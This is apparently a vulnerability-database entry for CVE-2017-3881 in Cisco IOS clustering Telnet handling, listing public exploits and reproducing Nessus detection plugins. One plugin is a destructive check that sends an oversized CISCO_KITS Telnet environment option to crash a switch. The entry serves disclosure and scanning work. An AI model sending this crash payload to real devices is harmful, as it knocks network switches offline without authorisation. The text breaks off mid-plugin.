Vulnerabilities > CVE-2017-3881 - Improper Input Validation vulnerability in Cisco IOS
Summary
A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Server Side Include (SSI) Injection An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
- Cross Zone Scripting An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
- Cross Site Scripting through Log Files An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
Exploit-Db
description Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform. Tags: Remote id EDB-ID:42122 last seen 2017-06-05 modified 2017-04-12 published 2017-04-12 reporter Exploit-DB source https://www.exploit-db.com/download/42122/ title Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution description Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform id EDB-ID:41874 last seen 2017-04-13 modified 2017-04-12 published 2017-04-12 reporter Exploit-DB source https://www.exploit-db.com/download/41874/ title Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution description Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform. Tags: Remote file exploits/hardware/remote/41872.py id EDB-ID:41872 last seen 2017-04-12 modified 2017-04-12 platform hardware port 23 published 2017-04-12 reporter Exploit-DB source https://www.exploit-db.com/download/41872/ title Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution type remote id EDB-ID:41874
Metasploit
description | This module triggers a Denial of Service condition in the Cisco IOS telnet service affecting multiple Cisco switches. Tested against Cisco Catalyst 2960 and 3750. |
id | MSF:AUXILIARY/DOS/CISCO/IOS_TELNET_ROCEM |
last seen | 2020-06-13 |
modified | 2017-07-24 |
published | 2017-06-25 |
references | |
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_telnet_rocem.rb |
title | Cisco IOS Telnet Denial of Service |
Nessus
NASL family CISCO NASL id CISCO-SA-20170317-CMP-IOS.NASL description According to its self-reported version and configuration, the Cisco IOS software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. last seen 2020-03-17 modified 2017-03-27 plugin id 97991 published 2017-03-27 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97991 title Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) code #TRUSTED 838d07d577e11258877353feb40635612dbdb91348043403f01a6f6bc49d82b0ee30771ddc74f7f03f0e3a5addeb4055677f0ac09bff464032324572bca3bee6d5fa2b75b425ca95db7334aac68e8019c987405eafadcb8793d3355761c95ebc4986251bd3126d10d3b094b85b5adaf65d6bc158973045997bf21da4947a9c8399a245e8ec58230958c818b53505db8bdef163755b16cec94ec6d9da9874a48ee1c3f29764f2766e3a4b2c0e4b0bca44c8d901e09523ddfa45cb2e5728406097451ff050f796bc28c5f07338fd0f22fef489c36280f9f5343bd43bcebe3012fecbdff8b2a928c46da2b4dae287069e3e90701a07402639b9c21755cb0459b3157c49429de8c41af44233bfc7d94ad13f1c25d303f927fcb04627319b77f5dbc86ca78211e12a469c94133b2a0b34f125deef0cb440293eaf4680da1f6328e1b10b31af641b03fb64cb261a7459229472eb8baea53b0a02977249f452de95c1210ad276c6806a138333abb3f3885338d3c3f77eb3da435d0cee06601ffc606c14c2c19473c1f61e8ddae09d9906f2c38afac4fe2dd5507fb23ec1aa5b1400dd15614b7c03980a34f6de8a48dd8270032bfd00b81cd852ae1f3f2f44813961d5c7d115ff40af7765ee642f8cc46f0fd98ee7d6435acc998178afe4da10b34d3931af2b896c61a3441aa18b064afd19957c875f344e562e12049fc41b99e85e6748 # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97991); script_version("1.11"); script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/10"); script_cve_id("CVE-2017-3881"); script_bugtraq_id(96960); script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893"); script_xref(name:"IAVA", value:"2017-A-0073"); script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp"); script_name(english:"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)"); script_summary(english:"Checks the IOS version."); script_set_attribute(attribute:"synopsis", value: "The remote device is missing a vendor-supplied security patch."); script_set_attribute(attribute:"description", value: "According to its self-reported version and configuration, the Cisco IOS software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237"); script_set_attribute(attribute:"solution", value: "Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol for incoming connections."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-3881"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/27"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("cisco_ios_version.nasl"); script_require_keys("Host/Cisco/IOS/Version"); exit(0); } include("audit.inc"); include("cisco_func.inc"); include("cisco_kb_cmd_func.inc"); flag = 0; override = 0; cmds = make_list(); ver = get_kb_item_or_exit("Host/Cisco/IOS/Version"); # Check for vuln version # these were extracted from the CVRF if ( ver == "12.2(18)S" || ver == "12.2(25)S" || ver == "12.2(25)S1" || ver == "12.1(22)EA8" || ver == "12.1(11)EA1a" || ver == "12.1(22)EA12" || ver == "12.1(22)EA6" || ver == "12.1(14)EA1" || ver == "12.1(19)EA1b" || ver == "12.1(22)EA3" || ver == "12.1(14)EA1b" || ver == "12.1(20)EA2" || ver == "12.1(22)EA4a" || ver == "12.1(14)EA1a" || ver == "12.1(22)EA5a" || ver == "12.1(22)EA13" || ver == "12.1(22)EA1a" || ver == "12.1(12c)EA1a" || ver == "12.1(13)EA1c" || ver == "12.1(22)EA1b" || ver == "12.1(8)EA1c" || ver == "12.1(22)EA5" || ver == "12.1(22)EA10b" || ver == "12.1(20)EA1a" || ver == "12.1(22)EA11" || ver == "12.1(22)EA7" || ver == "12.1(22)EA1" || ver == "12.1(13)EA1b" || ver == "12.1(20)EA1" || ver == "12.1(13)EA1" || ver == "12.1(19)EA1a" || ver == "12.1(22)EA2" || ver == "12.1(19)EA1d" || ver == "12.1(22)EA9" || ver == "12.1(9)EA1" || ver == "12.1(22)EA14" || ver == "12.1(11)EA1" || ver == "12.1(22)EA8a" || ver == "12.1(12c)EA1" || ver == "12.1(22)EA10a" || ver == "12.1(19)EA1" || ver == "12.1(19)EA1c" || ver == "12.1(6)EA1" || ver == "12.1(22)EA10" || ver == "12.1(22)EA4" || ver == "12.1(13)EA1a" || ver == "12.1(22)EA6a" || ver == "12.2(25)EW" || ver == "12.2(20)EWA" || ver == "12.2(25)EWA" || ver == "12.2(25)EWA6" || ver == "12.2(25)EWA5" || ver == "12.2(25)EWA1" || ver == "12.2(25)EWA10" || ver == "12.2(25)EWA8" || ver == "12.2(20)EWA1" || ver == "12.2(25)EWA11" || ver == "12.2(25)EWA9" || ver == "12.2(25)EWA2" || ver == "12.2(25)EWA14" || ver == "12.2(25)EWA4" || ver == "12.2(20)EWA3" || ver == "12.2(25)EWA3" || ver == "12.2(25)EWA7" || ver == "12.2(20)EWA4" || ver == "12.2(25)EWA12" || ver == "12.2(25)EWA13" || ver == "12.2(20)EWA2" || ver == "12.2(35)SE" || ver == "12.2(18)SE" || ver == "12.2(20)SE" || ver == "12.2(25)SE" || ver == "12.2(37)SE" || ver == "12.2(53)SE1" || ver == "12.2(55)SE" || ver == "12.2(25)SE2" || ver == "12.2(40)SE2" || ver == "12.2(46)SE" || ver == "12.2(46)SE2" || ver == "12.2(50)SE2" || ver == "12.2(35)SE5" || ver == "12.2(50)SE1" || ver == "12.2(44)SE2" || ver == "12.2(20)SE3" || ver == "12.2(35)SE1" || ver == "12.2(50)SE5" || ver == "12.2(44)SE1" || ver == "12.2(53)SE" || ver == "12.2(37)SE1" || ver == "12.2(25)SE3" || ver == "12.2(35)SE3" || ver == "12.2(44)SE4" || ver == "12.2(55)SE3" || ver == "12.2(55)SE2" || ver == "12.2(40)SE" || ver == "12.2(44)SE" || ver == "12.2(52)SE" || ver == "12.2(58)SE" || ver == "12.2(50)SE3" || ver == "12.2(55)SE1" || ver == "12.2(35)SE2" || ver == "12.2(18)SE1" || ver == "12.2(40)SE1" || ver == "12.2(20)SE1" || ver == "12.2(44)SE6" || ver == "12.2(44)SE3" || ver == "12.2(53)SE2" || ver == "12.2(52)SE1" || ver == "12.2(46)SE1" || ver == "12.2(20)SE2" || ver == "12.2(54)SE" || ver == "12.2(44)SE5" || ver == "12.2(50)SE4" || ver == "12.2(50)SE" || ver == "12.2(20)SE4" || ver == "12.2(58)SE1" || ver == "12.2(55)SE4" || ver == "12.2(58)SE2" || ver == "12.2(55)SE5" || ver == "12.2(55)SE6" || ver == "12.2(55)SE7" || ver == "12.2(55)SE8" || ver == "12.2(55)SE9" || ver == "12.2(55)SE10" || ver == "12.2(55)SE11" || ver == "12.1(14)AZ" || ver == "12.2(20)EU" || ver == "12.2(20)EU1" || ver == "12.2(20)EU2" || ver == "12.2(20)EX" || ver == "12.2(44)EX" || ver == "12.2(40)EX3" || ver == "12.2(40)EX" || ver == "12.2(52)EX" || ver == "12.2(44)EX1" || ver == "12.2(40)EX2" || ver == "12.2(40)EX1" || ver == "12.2(55)EX" || ver == "12.2(46)EX" || ver == "12.2(52)EX1" || ver == "12.2(55)EX1" || ver == "12.2(55)EX2" || ver == "12.2(55)EX3" || ver == "12.2(58)EX" || ver == "12.2(25)SEB" || ver == "12.2(25)SEB2" || ver == "12.2(25)SEB1" || ver == "12.2(25)SEB4" || ver == "12.2(25)SEB3" || ver == "12.2(25)SEA" || ver == "12.2(25)EY" || ver == "12.2(46)EY" || ver == "12.2(55)EY" || ver == "12.2(25)EY1" || ver == "12.2(53)EY" || ver == "12.2(25)EY3" || ver == "12.2(37)EY" || ver == "12.2(25)EY2" || ver == "12.2(25)EY4" || ver == "12.2(25)EZ" || ver == "12.2(25)EZ1" || ver == "12.2(58)EZ" || ver == "12.2(53)EZ" || ver == "12.2(55)EZ" || ver == "12.2(60)EZ4" || ver == "12.2(60)EZ5" || ver == "12.2(25)SEC" || ver == "12.2(25)SEC2" || ver == "12.2(25)SEC1" || ver == "12.2(31)SG" || ver == "12.2(25)SG" || ver == "12.2(37)SG" || ver == "12.2(44)SG" || ver == "12.2(50)SG3" || ver == "12.2(31)SG1" || ver == "12.2(53)SG" || ver == "12.2(31)SG3" || ver == "12.2(50)SG6" || ver == "12.2(53)SG1" || ver == "12.2(137)SG" || ver == "12.2(46)SG" || ver == "12.2(25)SG1" || ver == "12.2(53)SG2" || ver == "12.2(50)SG5" || ver == "12.2(37)SG1" || ver == "12.2(53)SG3" || ver == "12.2(50)SG8" || ver == "12.2(25)SG3" || ver == "12.2(50)SG2" || ver == "12.2(40)SG" || ver == "12.2(25)SG2" || ver == "12.2(54)SG1" || ver == "12.2(44)SG1" || ver == "12.2(50)SG1" || ver == "12.2(52)SG" || ver == "12.2(54)SG" || ver == "12.2(144)SG" || ver == "12.2(31)SG2" || ver == "12.2(50)SG" || ver == "12.2(25)SG4" || ver == "12.2(50)SG7" || ver == "12.2(53)SG4" || ver == "12.2(50)SG4" || ver == "12.2(46)SG1" || ver == "12.2(53)SG5" || ver == "12.2(53)SG6" || ver == "12.2(53)SG7" || ver == "12.2(53)SG8" || ver == "12.2(53)SG9" || ver == "12.2(53)SG10" || ver == "12.2(53)SG11" || ver == "12.2(25)FX" || ver == "12.2(25)FY" || ver == "12.2(25)SEF" || ver == "12.2(25)SEF1" || ver == "12.2(25)SEF2" || ver == "12.2(25)SEF3" || ver == "12.2(25)SEE" || ver == "12.2(25)SEE1" || ver == "12.2(25)SEE3" || ver == "12.2(25)SEE4" || ver == "12.2(25)SEE2" || ver == "12.2(25)SED" || ver == "12.2(25)SED1" || ver == "12.2(31)SGA" || ver == "12.2(31)SGA3" || ver == "12.2(31)SGA2" || ver == "12.2(31)SGA10" || ver == "12.2(31)SGA5" || ver == "12.2(31)SGA4" || ver == "12.2(31)SGA11" || ver == "12.2(31)SGA6" || ver == "12.2(31)SGA1" || ver == "12.2(31)SGA7" || ver == "12.2(31)SGA8" || ver == "12.2(31)SGA9" || ver == "12.2(25)SEG" || ver == "12.2(25)SEG1" || ver == "12.2(25)SEG3" || ver == "12.2(25)FZ" || ver == "12.2(52)XO" || ver == "12.2(54)XO" || ver == "12.2(40)XO" || ver == "12.2(44)SQ" || ver == "12.2(44)SQ2" || ver == "12.2(50)SQ2" || ver == "12.2(50)SQ1" || ver == "12.2(50)SQ" || ver == "12.2(50)SQ3" || ver == "12.2(50)SQ4" || ver == "12.2(50)SQ5" || ver == "12.2(50)SQ6" || ver == "12.2(50)SQ7" || ver == "15.0(1)XO1" || ver == "15.0(1)XO" || ver == "15.0(2)XO" || ver == "15.2(4)S2" || ver == "15.2(4)S3" || ver == "15.0(1)EY" || ver == "15.0(1)EY1" || ver == "15.0(1)EY2" || ver == "15.0(2)EY" || ver == "15.0(2)EY1" || ver == "15.0(2)EY2" || ver == "15.0(2)EY3" || ver == "12.2(54)WO" || ver == "15.0(1)SE" || ver == "15.0(2)SE" || ver == "15.0(1)SE1" || ver == "15.0(1)SE2" || ver == "15.0(1)SE3" || ver == "15.0(2)SE1" || ver == "15.0(2)SE2" || ver == "15.0(2)SE3" || ver == "15.0(2)SE4" || ver == "15.0(2)SE5" || ver == "15.0(2)SE6" || ver == "15.0(2)SE7" || ver == "15.0(2)SE8" || ver == "15.0(2)SE9" || ver == "15.0(2a)SE9" || ver == "15.0(2)SE10" || ver == "15.0(2)SE10a" || ver == "15.0(1)SY1" || ver == "15.1(1)SG" || ver == "15.1(2)SG" || ver == "15.1(1)SG1" || ver == "15.1(1)SG2" || ver == "15.1(2)SG1" || ver == "15.1(2)SG2" || ver == "15.1(2)SG3" || ver == "15.1(2)SG4" || ver == "15.1(2)SG5" || ver == "15.1(2)SG6" || ver == "15.1(2)SG7" || ver == "15.1(2)SG8" || ver == "15.0(2)SG" || ver == "15.0(2)SG1" || ver == "15.0(2)SG2" || ver == "15.0(2)SG3" || ver == "15.0(2)SG4" || ver == "15.0(2)SG5" || ver == "15.0(2)SG6" || ver == "15.0(2)SG7" || ver == "15.0(2)SG8" || ver == "15.0(2)SG9" || ver == "15.0(2)SG10" || ver == "15.0(2)SG11" || ver == "15.0(2)EX" || ver == "15.0(2)EX1" || ver == "15.0(2)EX2" || ver == "15.0(2)EX3" || ver == "15.0(2)EX4" || ver == "15.0(2)EX5" || ver == "15.0(2)EX6" || ver == "15.0(2)EX7" || ver == "15.0(2)EX8" || ver == "15.0(2a)EX5" || ver == "15.0(2)EX10" || ver == "15.1(2)EY1" || ver == "15.3(1)S1" || ver == "15.0(2)EC" || ver == "15.0(2)EB" || ver == "15.2(1)E" || ver == "15.2(2)E" || ver == "15.2(1)E1" || ver == "15.2(3)E" || ver == "15.2(1)E2" || ver == "15.2(1)E3" || ver == "15.2(2)E1" || ver == "15.2(2b)E" || ver == "15.2(4)E" || ver == "15.2(3)E1" || ver == "15.2(2)E2" || ver == "15.2(2a)E1" || ver == "15.2(2)E3" || ver == "15.2(2a)E2" || ver == "15.2(3)E2" || ver == "15.2(3a)E" || ver == "15.2(3a)E1" || ver == "15.2(3)E3" || ver == "15.2(3m)E2" || ver == "15.2(4)E1" || ver == "15.2(2)E4" || ver == "15.2(2)E5" || ver == "15.2(4)E2" || ver == "15.2(4m)E1" || ver == "15.2(3)E4" || ver == "15.2(5)E" || ver == "15.2(3m)E7" || ver == "15.2(4)E3" || ver == "15.2(2)E6" || ver == "15.2(5a)E" || ver == "15.2(5)E1" || ver == "15.2(5b)E" || ver == "15.2(4m)E3" || ver == "15.2(3m)E8" || ver == "15.2(2)E5a" || ver == "15.2(5c)E" || ver == "15.2(3)E5" || ver == "15.2(2)E5b" || ver == "15.2(4n)E2" || ver == "15.2(4o)E2" || ver == "15.2(5a)E1" || ver == "15.2(4p)E1" || ver == "15.2(5)E2b" || ver == "15.1(3)MRA4" || ver == "15.0(2)ED" || ver == "15.0(2)EZ" || ver == "15.2(1)EY" || ver == "15.0(2)EJ" || ver == "15.0(2)EJ1" || ver == "15.4(3)M7a" || ver == "15.5(3)S7a" || ver == "15.2(2)EB" || ver == "15.2(2)EB1" || ver == "15.2(2)EB2" || ver == "15.3(3)JN13" || ver == "12.4(25e)JAP1n" || ver == "15.0(2)SQD" || ver == "15.0(2)SQD1" || ver == "15.0(2)SQD2" || ver == "15.0(2)SQD3" || ver == "15.0(2)SQD4" || ver == "15.0(2)SQD5" || ver == "15.6(2)S0a" || ver == "15.6(2)S3" || ver == "15.3(3)JBB6a" || ver == "15.3(3)JNC4" || ver == "15.6(2)SP5" || ver == "15.3(3)JPB" || ver == "15.2(4)EC1" || ver == "15.2(4)EC2" || ver == "15.3(3)JPC3" ) flag++; if(!flag) audit(AUDIT_INST_VER_NOT_VULN, "Cisco IOS", ver); # Check that device is configured to accept incoming Telnet connections if (get_kb_item("Host/local_checks_enabled")) { flag = 0; # from the advisory command = "show running-config | include ^line vty|transport input"; command_kb = "Host/Cisco/Config/" + command; buf = cisco_command_kb_item(command_kb, command); if (check_cisco_result(buf)) { # if transport input lists "all" or "telnet", we are vuln # otherwise, if there is a "line vty" that is not followed by a # transport input line, we are vuln # otherwise, we are not vuln if (preg(string:buf, pattern:"^\s+transport input.*(all|telnet).*", multiline:TRUE)) { flag = 1; cmds = make_list(command); } else { lines = split(buf, keep:FALSE); for (i = 0; i < max_index(lines); i++) { line = lines[i]; if ((i+1) >= max_index(lines)) next_line = ""; else next_line = lines[i+1]; if (line =~ "^line vty" && next_line !~ "^\s+transport input") { flag = 1; cmds = make_list(command); } } } } else if (cisco_needs_enable(buf)) { flag = 1; override = 1; } if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, "Cisco IOS", ver); } if (flag) { security_report_cisco( port : 0, severity : SECURITY_HOLE, override : override, version : ver, bug_id : 'CSCvd48893', cmds : cmds ); } else audit(AUDIT_HOST_NOT, "affected");
NASL family CISCO NASL id CISCO-SA-20170317-CMP-DOS.NASL description The remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 103783 published 2017-10-11 reporter This script is Copyright (C) 2017-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/103783 title Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(103783); script_version("1.4"); script_cvs_date("Date: 2018/07/06 11:26:06"); script_cve_id("CVE-2017-3881"); script_bugtraq_id(96960); script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893"); script_xref(name:"IAVA", value:"2017-A-0073"); script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp"); script_name(english:"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)"); script_summary(english:"Attempts to crash a Cisco switch."); script_set_attribute(attribute:"synopsis", value: "The remote device is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237"); script_set_attribute(attribute:"solution", value: "Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable the Telnet protocol for incoming connections."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/10/11"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_KILL_HOST); script_family(english:"CISCO"); script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc."); script_dependencies("telnet.nasl"); script_require_ports("Services/telnet", 23); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("telnet_func.inc"); port = get_service(svc: 'telnet', default: 23, exit_on_fail: 1); soc = open_sock_tcp(port); if (! soc) audit(AUDIT_SOCK_FAIL, port); IAC = '\xff'; ENV = '\x24'; IS = '\x00'; SEND = '\x01'; USERVAR = '\x03'; VALUE = '\x01'; SB = raw_string(OPT_SUBOPT); SE = raw_string(OPT_ENDSUBOPT); # Consume what the server sends telnet_negotiate(socket:soc); # Query environment variables req = IAC + SB + ENV + SEND + USERVAR + IAC + SE; send(socket: soc, data: req); r = recv(socket: soc, length: 1024); # Affected devices should have the "CISCO_KITS" variable env_name = 'CISCO_KITS'; if (env_name >!< r) { audit(AUDIT_HOST_NOT, 'affected'); } # Three parts in env value env_val = '3:' + crap(data:'A', length:0x400) # data to be copied to a stack buf # seen: 0x80 bytes to RA + ':9:'; # Attempt to crash the switch req = IAC + SB + ENV + IS + USERVAR + env_name + VALUE + env_val + IAC + SE; send(socket: soc, data: req); sleep(3); close(soc); if (service_is_dead(port:port)) { security_report_v4( port: port, severity: SECURITY_HOLE ); } else { audit(AUDIT_HOST_NOT, 'affected'); }
NASL family CISCO NASL id CISCO-SA-20170317-CMP-IOSXE.NASL description According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code. last seen 2020-03-17 modified 2017-03-27 plugin id 97992 published 2017-03-27 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97992 title Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) code #TRUSTED 82f7d85f534f6752d3fe7f7b6c9efe7a5c789b702ce5ee3379eaad8ad84fef62e887ca49ddebebc5899d8bd48f3cb70694366599ff814b4642b913b1d50101cf66165a279c020082d915ebc36ce9af229c15d6ee4d26df75405e53bc163c1c45cf2890531985b2c18e946f3fa3570814f1ea9329d3370b56030aca7d623b3ba4fd420554ec3861bce6017beecad78c59e711d52069798c4280fbc55ae0ebbd5d8bc9a927b2b86668ee95c7d68b2c2f140b22435c2763eb475fa2970ad23ede7aca868355d98a4e6fa7b53bef2f9c35a454c4df5445e0586b133305f5abc8900496b7f4e47da4f58a5e2e131f133eb4bf378a730979586512bf0f9d60dc7cf4a8939dfa73a2ceb5f24f8f7e211816f4163eff9e63faab27c9e0f5208311247cbd9be49811fdd098a3d25099b7394ae278a3e711886e480844754274eba5ccd597e192f557322792837dc007eedf8595b5883d76b09a24a7da98de166cbea7d5d6569bdf4c6a24091846c401473b410bbc86cc1fc2c7561a3e62bc2e262c682abdcb03c132a92b2aa15e77ad075f05175a5421095aa2f88fda75301f12c2870da96752834b7f3969e2c41cadc09809f0cfe98eb31555ac2ed0a670aef74c72802086c175ecda257781ea2df7a3f02d6812aec84c37aab6faaf50ccf9852dc51303eda1c6cb767efebc97281fae64e33e9cabd160b8df1971f762e9b682370dae44 # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97992); script_version("1.9"); script_set_attribute(attribute:"plugin_modification_date", value:"2019/04/10"); script_cve_id("CVE-2017-3881"); script_bugtraq_id(96960); script_xref(name:"CISCO-BUG-ID", value:"CSCvd48893"); script_xref(name:"IAVA", value:"2017-A-0073"); script_xref(name:"CISCO-SA", value:"cisco-sa-20170317-cmp"); script_name(english:"Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)"); script_summary(english:"Checks the IOS XE version."); script_set_attribute(attribute:"synopsis", value: "The remote device is missing a vendor-supplied security patch."); script_set_attribute(attribute:"description", value: "According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code."); # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?7cb68237"); script_set_attribute(attribute:"solution", value: 